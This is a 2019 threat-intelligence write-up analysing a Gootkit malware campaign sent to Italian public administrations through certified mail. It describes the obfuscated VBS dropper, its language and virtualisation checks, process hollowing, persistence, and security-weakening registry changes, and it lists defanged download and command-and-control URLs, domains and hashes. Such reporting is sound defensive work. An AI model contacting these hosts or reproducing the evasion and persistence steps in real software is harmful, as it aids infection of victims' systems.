Gootkit malware campaign again from italian certified mail È stato salvato
Article
Gootkit malware campaign again from italian certified mail
15-05-2019
In the previous weeks, Italian public administrations have been subjected to various malspam campaigns. Behind some of these campaigns, artifacts related to the Gootkit malware family have been identified. The following analysis is related to the last detected Gootkit malware.
Analysis
The following analysis is relative to the e-mail having the file ITXXXXXXX.zip as an attachment, where XXXXXXX is a 7 random numbers string. The subject of the e-mail refers to a non-existent document from INPS.
Inside the attached zip file is the IT60315662813266170515781647592.vbs file, which appears to have multiple obfuscated functions.
Following the vbs file deobfuscation, I got the following payload that runs in powershell:
The above command converts an array of integers to the corresponding characters of the ASCII table, and launches the resulting converted command. The following is the evidence of the command:
From the image it is clear that the above code checks that:
The language used by the system is different from the Romanian, Ukrainian, Belarusian, Chinese languages ;
The execution environment is NOT virtualized.
If the checks are successful, the code will download 2 files from the following URLs:
Win00ce.js hxxp://ema.emeraldsurfsciences.com/v2i.php?need=js&vid=pec10vbs&cvzfx
Crypsrv.exe hxxp://vdd.c21paul.info/api?Iwtsg
Subsequently the two files will be executed on the victim’s operating system.
The contents of the Win00ce.js file are javascript instructions that for completeness I report below (in part) :
Through shift operations, that snippet is reconstructed. The resulting code is following (detail):
The result of the operation highlighted in the red box is added to each integer of the array and then converted to ASCII.
The result is shown below:
From the code reported it is possible to notice that it is checked again that the language of the system is different from the Chinese, Romanian, Russian, Ukrainian, Belarusian, languages and that the execution environment is NOT virtualized.
If the checks are successful, the code will download 2 files from the following URLs:
WindowsIndexingService.js
hxxp://zzi.belltowers.ca/v2i.php?need=js&
documents
hxxp: //zzi.belltowers.ca/v2i.php?need=body&
Unfortunately, at the time of analysis the two URLs shown were not reachable.
Regarding the PE Crypsrv.exe, the relative hashes are listed below:
From the dynamic analysis it was found that the executable resorted to the use of the advpack.dll library, a method to make itself persistent in the system and start automatically every time the S.O .: restarts.
A peculiarity of this malware is the use of the so-called Process Hollowing, which allows a legitimate process to act as a container for a malicious process.
Memory is allocated from the initial process to host the malicious process.
Extracting the malicious process and statically analyzing it showed that there are two domains:
ssw.138front[.]com
martatov[.]top
The following is the evidence:
The malware also sets some environment variables, such as crackmeololo, crackme, trustedcomp and true. The following is the evidence:
Also by accessing and modifying the registry keys indicated below, the executable
• ensures persistence in the system even if the PC is started in safe mode;
• modifies the policies of the (SRP) – Software Restriction Policies, to allow the launch of non-secure software with elevated privileges;
Furthermore, the executable reduces the security of the PC by modifying the Internet Explorer browser zones in the Windows registry:
| KEY | VALUE |
| USER S-1-5-21-2580483871-590521980-3826313501-500 SOFTWARE MICROSOFT WINDOWS CURRENTVERSION INTERNET SETTINGS ZONES 1 | 3 |
| USER S-1-5-21-2580483871-590521980-3826313501-500 SOFTWARE MICROSOFT WINDOWS CURRENTVERSION INTERNET SETTINGS ZONES 2 | 3 |
| USER S-1-5-21-2580483871-590521980-3826313501-500 SOFTWARE MICROSOFT WINDOWS CURRENTVERSION INTERNET SETTINGS ZONES 3 | 3 |
| USER S-1-5-21-2580483871-590521980-3826313501-500 SOFTWARE MICROSOFT WINDOWS CURRENTVERSION INTERNET SETTINGS ZONES 4 | 3 |
| USER S-1-5-21-2580483871-590521980-3826313501-500 SOFTWARE MICROSOFT WINDOWS CURRENTVERSION INTERNET SETTINGS ZONES 0 | 3 |
The executable establishes a connection with the C2 server for downloading the third stage, which will then be injected into memory.
Below is the URL on which the request is made:
hxxp: //ssw.138front.com/rbody32
Below the headers set by the malware to make the request the third stage:
Altogether the Crypsrv.exe file is a malware belonging to the Gootkit family (Trojan) and the zip file, containing the vbs appears to be a second stage dropper.
Hashes:
Cryptsrv.exe
| md5 | 763804AA3B199BFE17E764A289D7735 |
| sha1 | CDC716F843A00F34325C87EFD9284CB30AF999AC |
| sha256 | EA0BC812663FC5A49E44651AF0D1F4226D69FAF14C80D6CC4E8EC4CC82D12717 |
rbody32 (third stage)
| MD5 | C9C42FCA0C6220EE49E5947FC9AE4E0B |
| SHA-1 | 507749D4766D8D396AA33B31ED710E312F46A2F6 |
| SHA-256 | 1B91110A9DB7998BB00716716297D0516CB5190C98B5664101E38F0FB9F75A4D |
Ioc
hxxp://ema.emeraldsurfsciences.com/v2i.php?need=js&vid=pec10vbs&cvzfx
hxxp://vdd.c21paul.info/api?Iwtsg
hxxp://zzi.belltowers.ca/v2i.php?need=js&
hxxp://zzi.belltowers.ca/v2i.php?need=body&
ssw.138front[.]com
martatov[.]top
